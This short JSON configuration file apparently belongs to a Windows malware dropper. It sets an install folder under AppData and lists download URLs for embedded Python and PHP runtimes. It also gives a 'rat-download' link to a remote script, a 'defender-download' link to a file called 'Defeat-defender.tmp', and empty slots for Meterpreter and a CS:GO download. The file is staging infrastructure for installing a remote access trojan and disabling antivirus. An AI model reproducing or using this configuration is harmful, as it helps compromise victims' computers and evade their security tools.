{
  "setup-path": "C:/Users/%USERNAME%/AppData/Roaming/test",
  "python-download": "https://www.python.org/ftp/python/3.10.7/python-3.10.7-embed-win32.zip",
  "php-download": "https://windows.php.net/downloads/releases/php-7.4.30-Win32-vc15-x86.zip",
  "rat-download": "https://raw.githubusercontent.com/delypeter/http-delypeter.hu/main/main.py",
  "meterpreter-download": "",
  "defender-download": "https://raw.githubusercontent.com/delypeter/http-delypeter.hu/main/Defeat-defender.tmp",
  "csgo-download": "",
  "csgo-path": ""
}
